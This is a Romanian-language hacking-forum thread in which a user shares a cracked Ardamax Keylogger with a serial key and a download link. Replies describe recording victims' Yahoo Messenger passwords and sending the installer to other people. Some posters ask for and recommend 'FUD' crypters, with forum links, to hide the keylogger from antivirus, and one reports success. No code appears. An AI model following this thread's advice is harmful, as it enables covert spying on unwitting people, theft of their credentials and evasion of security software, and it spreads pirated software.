Jump to content
Alexie

Ardamax Keylogger 3.7.8+Serial(scris aici nu de dl)

Recommended Posts

Posted

Am vazut ca e un post in care e pus cu virus...si mam decis sa caut si sa il pun ca sa il poata lua tot omu fara grija virusului..

Serial: Nume: Popescu Marian

Code: 083A-E649-5E15

Download link:2shared - download full_akl 3.7.8.exe

Nu va luati dupa nr meu de posturi :) ..daca e vreo problema...ziceti si incerc sa rezolv

L.E. pt cei care sunt incepatori si nu stiu sa il foloseasca...aici e tutorialul de la 2.8..la 3.7.8 e cam tot asa: http://rstcenter.com/forum/17138-tutorial-keylogger.rst

Posted

Aproape ca merge, dupa instalare a functionat cateva minute , inregistreaza yahoo chat, web browsing, username + pass la YM, dar dupa un timp nu mai arata log. Apare mesajul " Log Viewer not installed". Pacat , chiar aveam nevoie de o versiune functionala.

Posted
Aproape ca merge, dupa instalare a functionat cateva minute , inregistreaza yahoo chat, web browsing, username + pass la YM, dar dupa un timp nu mai arata log. Apare mesajul " Log Viewer not installed". Pacat , chiar aveam nevoie de o versiune functionala.

ti l-a sters antivirusul sau Windows Defender-ul daca ai win7

Posted

am facut exact cum era acolo am pus numele virusului Yahoo Messenger 12 deschid aplicatia o vad ardamax keylogger in bara dar cand dau dublu clik pe el imi da eroarea : "C:\windows\system32\28463\AQCG.005'web log fie corupted va rog ajutatimaa si scuzatima daca am postat unde nu trebuie dar sunt nou pe acest forum

Posted

O intrebare...la rezultatul scanarii, jumatate din programele antivirus mi-l detecteaza..deci daca il dau cuiva si are antivirus sunt sanse mari sa nu il deschida/stearga/etc. Aveti vreo sugestie pentru asta?

Posted (edited)
O intrebare...la rezultatul scanarii, jumatate din programele antivirus mi-l detecteaza..deci daca il dau cuiva si are antivirus sunt sanse mari sa nu il deschida/stearga/etc. Aveti vreo sugestie pentru asta?

Cauta un crypter bun. Gasesti o gramada pe forum.

E destul de bun, mie mi-a fost de folos si asta : http://rstcenter.com/forum/42103-li0n-polymorphic-crypter-v1-1-%5Bfud%5D.rst

Le poti testa pe aman2 sa vezi de care esti mai multumit.

Edited by DrPsychO
  • Downvote 1
Posted (edited)
Cauta un crypter bun. Gasesti o gramada pe forum.

Imi cer scuze..dar sunt cam noob in ceea ce inseamna crypter. Luat dupa denumire, inseamna sa criptezi ceva. Nu am folosit niciodata, dar presupun ca o sa cripteze acel "program" astfel incat sa treaca niste teste / sau sa il scrie in alt mod.(am I right?) Imi poti totusi recomanda unul? (bun, rau, cum o fi el)

PS: mersi de raspunsul prompt!

Edit: http://rstcenter.com/forum/41792-antihelix_crypter-4.rst e bun?

Final edit: am reusit, mersi mult de ajutor!

Edited by Dyad
Posted

Pai deh daca nici un amarat de keylogger nu puteti instala si configura atunci nene duceti-va la counter strike.

Numai mura in gura vreti, documentati-va pe google, folositi virtual machine daca aveti indoieli, jucati-va cu el vedeti ce face.

Posted

salut , eu am instalat ardamax 3.7.8 nu imi trimite mail decat de la pc meu :) , am trimis la vreo 4 baieti fisieru install.exe din htv , nimik ... am instalat apoi si ver 2.8 nothing ... what`s happend ? :)